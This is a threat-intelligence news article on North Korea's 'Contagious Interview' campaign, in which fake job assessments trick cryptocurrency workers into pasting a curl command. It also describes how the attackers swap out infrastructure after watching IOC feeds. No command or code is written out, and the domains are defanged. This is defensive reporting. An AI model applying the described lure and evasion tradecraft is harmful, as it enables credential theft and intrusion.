North Korean Cyber Threat Actors Unveil Strategies for Replacing Infrastructure with New Assets

Over the past year, cybersecurity researchers have noted a significant increase in activity from North Korean threat actors employing advanced social engineering techniques to target professionals in the cryptocurrency sector. This campaign, known as Contagious Interview, disguises the delivery of sophisticated malware within a seemingly innocuous job-application process. Victims receive invitations to participate in mock assessments for non-existent roles, ultimately leading them to execute malicious scripts. The attackers operate a vast network of infrastructure, swiftly replacing compromised domains and servers to evade takedowns and maintain high engagement levels. In early 2025, they began registering domains like SkillQuestions[.]com and TalentCheck[.]pro, creating lure websites that prompt candidates to run shell commands under the pretext of troubleshooting errors. During these assessments, an on-page error, often a camera-access prompt, directs victims to paste a curl command into their terminal, resulting in a full compromise as the malware establishes persistent access and exfiltrates credentials.

The meticulous orchestration of these tactics, combined with tailored domain names, has led to over 230 confirmed victim engagements within a three-month timeframe. Analysts from SentinelLABS have observed that these operations rely on continuous monitoring of threat intelligence platforms such as Validin and VirusTotal. By registering community accounts shortly after new Indicators of Compromise (IOCs) are published in repositories like Maltrail’s APT_Lazarus[.]txt, the adversaries ensure they remain informed about their infrastructure exposure. Instead of making extensive modifications to existing assets, they prefer to deploy entirely new servers whenever a domain is disrupted, favouring operational agility over traditional defensive strategies. SentinelLABS researchers have identified that the infrastructure replacement cycle occurs within hours rather than weeks. When a service provider disables a domain, the threat actors promptly provision a new domain, migrate their malware distribution servers, and update command-and-control endpoints. Coordination among the team occurs through collaboration platforms like Slack, where automated bots share summaries of new domains, allowing individual operators to quickly engage with these updates. 

Categories: Cybersecurity Threats, Social Engineering Techniques, Malware Distribution 

Tags: Cybersecurity, North Korean, Threat Actors, Social Engineering, Cryptocurrency, Malware, Infrastructure, Exfiltration, Indicators of Compromise, Infection Mechanism